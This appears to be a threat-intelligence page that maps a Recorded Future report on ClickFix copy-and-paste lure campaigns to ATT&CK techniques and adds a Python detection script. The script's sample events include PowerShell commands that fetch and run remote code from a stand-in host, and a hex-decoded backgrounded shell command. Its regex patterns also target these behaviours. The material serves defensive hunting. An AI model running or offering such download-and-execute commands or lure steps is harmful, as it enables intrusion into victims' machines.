TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Recorded Future Blog

ClickFix Campaigns Targeting Windows and macOS

2026-03-25

ATT&CK techniques detected

48 predictions
T1059.001 PowerShell (97%)
“…system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT. Figure 8: command from the Booking campaign that reache…”

T1074.001 Local Data Staging (97%)
“…"soul", and "desire", to generate a randomized folder name under %LOCALAPPDATA%, where the staging files are placed. The script retrieves four primary files from nobovcs[.]com, detailed in Table 2. Filename / SHA-256: at.7z / c0af6e9d848ada3839811bf33eeb982e6c207e4c4001041…”

T1204.004 Malicious Copy and Paste (95%)
“…lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided s…”

T1204.004 Malicious Copy and Paste (94%)
“…the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (Figure 13). Figure 13: portion of JavaScri…”

T1204.004 Malicious Copy and Paste (93%)
“…. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages. Cluster 1 profile…”

T1204.001 Malicious Link (93%)
“ClickFix Campaigns Targeting Windows and macOS. Executive Summary: Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impers…”

T1204.004 Malicious Copy and Paste (92%)
“…) with Invoke-Expression (IEX). This allows for the seamless retrieval and execution of remote code entirely in memory. This combination is a high-fidelity hunt for ClickFix activity. String manipulation deception: using .Substring() or .Replace() to "build" commands cl…”

T1204.004 Malicious Copy and Paste (92%)
“…a fragmented threat landscape. The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turn…”

T1204.004 Malicious Copy and Paste (90%)
“ClickFix Campaigns Targeting Windows and macOS. Executive Summary: Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impers…”

T1059.001 PowerShell (89%)
“…hell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke Invoke-RestMethod to the domain nobovcs[.]com. Figure 4: obfuscated PowerShell command executed in a hidden window, dynamically rec…”

T1204.004 Malicious Copy and Paste (85%)
“…-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicate that ClickFix has transition…”

T1204.004 Malicious Copy and Paste (84%)
“…ins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system. Background: first documented in late…”

T1204.004 Malicious Copy and Paste (84%)
“…system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits. Looking ahead, ClickFix lures will likely become increasingly technically ad…”

T1059.004 Unix Shell (83%)
“…> zsh. The use of xxd -r -p in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. Persistence and backgrounding: use of nohup and the & operator. This ensures the malicious process continues to run in the…”

T1204 User Execution (81%)
“…a fragmented threat landscape. The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turn…”

T1204.004 Malicious Copy and Paste (76%)
“…selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims…”

T1204.004 Malicious Copy and Paste (74%)
“…: Booking.com. Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor's repeated use of a unique HTML title and…”

T1204 User Execution (73%)
“…ins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system. Background: first documented in late…”

T1059.001 PowerShell (72%)
“…of network traffic. Use Identity module: Recorded Future customers should leverage the Identity module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers. Disable Windows Run dialog via Group Policy Objects (GPOs)…”

T1204.002 Malicious File (69%)
“…execution and abuse of native command-line utilities. User awareness and training: conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.…”

T1547.001 Registry Run Keys / Startup Folder (67%)
“…58aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c. Table 2: filenames and SHA256 hashes of the files downloaded from nobovcs[.]com (source: Recorded Future). The script uses 7z.exe to extract at.7z (protected by the password "pppp"), which contains the NetSupp…”

T1059.001 PowerShell (63%)
“…. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages. Cluster 1 profile…”

T1202 Indirect Command Execution (62%)
“…> zsh. The use of xxd -r -p in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. Persistence and backgrounding: use of nohup and the & operator. This ensures the malicious process continues to run in the…”

T1204.001 Malicious Link (61%)
“…ins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system. Background: first documented in late…”

T1059.001 PowerShell (59%)
“…the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (Figure 13). Figure 13: portion of JavaScri…”

T1059.007 JavaScript (57%)
“…the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastruct…”

T1204.002 Malicious File (51%)
“…selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims…”

T1566.002 Spearphishing Link (48%)
“…accounting software, often leveraging aged domains to bypass security filters. Booking.com: used fraudulent domains to present fake verification portals. Birdeye: a large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating vi…”

T1204.004 Malicious Copy and Paste (47%)
“…relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts. The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in Table 12. Stage a…”

T1204.004 Malicious Copy and Paste (47%)
“…the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastruct…”

T1204.001 Malicious Link (43%)
“…selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims…”

T1071.001 Web Protocols (43%)
“…Fix domains in real time. Use Recorded Future threat intelligence: Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations platform data, specifically by leveraging continuously updated risk lists and by blockl…”

T1204 User Execution (40%)
“…selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims…”

T1547.001 Registry Run Keys / Startup Folder (39%)
“…b18b7c6acc7c. Table 4: filenames and SHA256 hashes of the files downloaded from checkpulses[.]com (source: Recorded Future). The 7z.exe utility is used to extract at.7z, which contains the NetSupport RAT binary neservice.exe. Persistence is established by adding a link…”

T1204.004 Malicious Copy and Paste (39%)
“…[.]244[.]70. The domain hotelupdatesys[.]com resolves to the same IP address as the NetSupport RAT C2 for sign-in-op-token[.]com. Figure 10: POST request from sign-in-op-token[.]com showing NetSupport interaction (source: Recorded Future). Cluster 3:…”

T1204.002 Malicious File (39%)
“…-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicate that ClickFix has transition…”

T1204.004 Malicious Copy and Paste (38%)
“…execution and abuse of native command-line utilities. User awareness and training: conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.…”

T1059.004 Unix Shell (37%)
“…relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts. The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in Table 12. Stage a…”

T1059 Command and Scripting Interpreter (36%)
“…> zsh. The use of xxd -r -p in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. Persistence and backgrounding: use of nohup and the & operator. This ensures the malicious process continues to run in the…”

T1583.001 Domains (35%)
“…accounting software, often leveraging aged domains to bypass security filters. Booking.com: used fraudulent domains to present fake verification portals. Birdeye: a large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating vi…”

T1564.011 Ignore Process Interrupts (34%)
“…> zsh. The use of xxd -r -p in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting. Persistence and backgrounding: use of nohup and the & operator. This ensures the malicious process continues to run in the…”

T1204.002 Malicious File (33%)
“…a fragmented threat landscape. The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turn…”

T1204.004 Malicious Copy and Paste (32%)
“…of network traffic. Use Identity module: Recorded Future customers should leverage the Identity module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers. Disable Windows Run dialog via Group Policy Objects (GPOs)…”

T1546.013 PowerShell Profile (32%)
“…system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT. Figure 8: command from the Booking campaign that reache…”

T1204.004 Malicious Copy and Paste (32%)
“Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detai…”

T1059.001 PowerShell (31%)
“…the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastruct…”

T1204.001 Malicious Link (30%)
“…lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided s…”

T1218.011 Rundll32 (30%)
“…and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer and Vidar, or remote access trojans (RATs) such as NetSupport RAT and Odyssey Stealer. These operations are frequently supported by highly adapti…”
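The hunt heuristics quoted in the excerpts above (Invoke-Expression paired with IRM/IWR, execution in a hidden window, commands assembled at runtime with .Substring() or .Replace(), xxd -r -p in a user-typed command, nohup with the & operator) can be turned into a single scoring rule over process-creation events. The Python below is an added example written for this page, not code from Recorded Future or the report. The rule names, weights, the threshold, the -ep bypass/-nop rule, the parent-process rule and the sample events are this example's own assumptions; only the behaviours it looks for come from the excerpts.

```python
"""Heuristic hunt for ClickFix-style command lines on Windows and macOS.

Added example for this page, not code from Recorded Future or the report.
Weights, threshold and rule names are assumptions; the behaviours matched
(IEX + IRM/IWR, hidden window, .Substring()/.Replace() command building,
xxd -r -p, nohup with &) are those described in the report excerpts.
"""
import re

# (rule name, weight, pattern). The ep_bypass rule and all weights are assumptions.
WINDOWS_RULES = [
    ("iex",           2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote_fetch",  2, re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)),
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("string_build",  2, re.compile(r"\.(?:substring|replace)\s*\(", re.I)),
    ("ep_bypass",     1, re.compile(r"-(?:ep|executionpolicy)\s+bypass\b|-nop(?:rofile)?\b", re.I)),
]
MACOS_RULES = [
    ("xxd_reverse",   4, re.compile(r"\bxxd\s+(?:-r\s+-p|-p\s+-r|-rp|-pr)\b")),
    ("nohup_bg",      2, re.compile(r"\bnohup\b.*&")),
    ("pipe_to_shell", 2, re.compile(r"\|\s*(?:ba|z)?sh\b|\bbase64\s+(?:-d|--decode)\b")),
]
# A command typed into the Run dialog is spawned under explorer.exe; a Terminal paste
# is spawned under the terminal app. That parent is weak evidence on its own (+1).
INTERACTIVE_PARENTS = {"windows": {"explorer.exe"}, "macos": {"terminal", "iterm2"}}
THRESHOLD = 5  # assumption: tune against your own baseline of admin activity


def score_event(event):
    """Return (score, [matched rule names]) for one process-creation event.

    event: {"os": "windows" | "macos", "parent": <parent image name>, "cmdline": <str>}
    """
    rules = WINDOWS_RULES if event["os"] == "windows" else MACOS_RULES
    score, hits = 0, []
    for name, weight, pattern in rules:
        if pattern.search(event["cmdline"]):
            score += weight
            hits.append(name)
    if event["parent"].lower() in INTERACTIVE_PARENTS[event["os"]]:
        score += 1
        hits.append("interactive_parent")
    return score, hits


def hunt(events, threshold=THRESHOLD):
    """Return the events scoring at or above threshold, highest score first."""
    flagged = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            flagged.append({"score": score, "hits": hits, "cmdline": event["cmdline"]})
    flagged.sort(key=lambda f: f["score"], reverse=True)
    return flagged


# Constructed sample events (not real telemetry); hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Run-dialog launch of a hidden PowerShell that fetches and IEXes remote code
    {"os": "windows", "parent": "explorer.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (irm https://example.invalid/v.txt)\""},
    # Same idea, but the cmdlet name is assembled at runtime so a literal match fails
    {"os": "windows", "parent": "explorer.exe",
     "cmdline": "powershell -c \"$c='Invoke-RXestMethod'.Replace('X',''); iex (& $c https://example.invalid/v)\""},
    # Routine scheduled script: nothing to see
    {"os": "windows", "parent": "svchost.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    # Terminal paste that hex-decodes and backgrounds a command (hex decodes to "ls -la")
    {"os": "macos", "parent": "Terminal",
     "cmdline": "nohup bash -c \"$(echo 6c73202d6c61 | xxd -r -p)\" >/dev/null 2>&1 &"},
    # Benign backgrounded build: nohup alone stays below threshold
    {"os": "macos", "parent": "Terminal",
     "cmdline": "nohup ./build.sh > build.log 2>&1 &"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding['score']}] {', '.join(finding['hits'])}\n    {finding['cmdline']}")
```

Run it as-is to see the three constructed suspects ranked 8, 7 and 5; in production, map Sysmon Event ID 1, EDR or macOS Endpoint Security process-exec records onto the `os`/`parent`/`cmdline` fields. The second Windows sample shows why the `string_build` and parent rules matter: once the cmdlet name is built with .Replace(), the `remote_fetch` literal never fires and only the combination of IEX, string assembly and an explorer.exe parent carries the event over the threshold. Expect noise from administrators who legitimately use xxd or nohup; the weights are a starting point, not a verdict.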

Summary

Insikt Group reveals five ClickFix social engineering clusters (including those impersonating QuickBooks, Booking.com and Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense.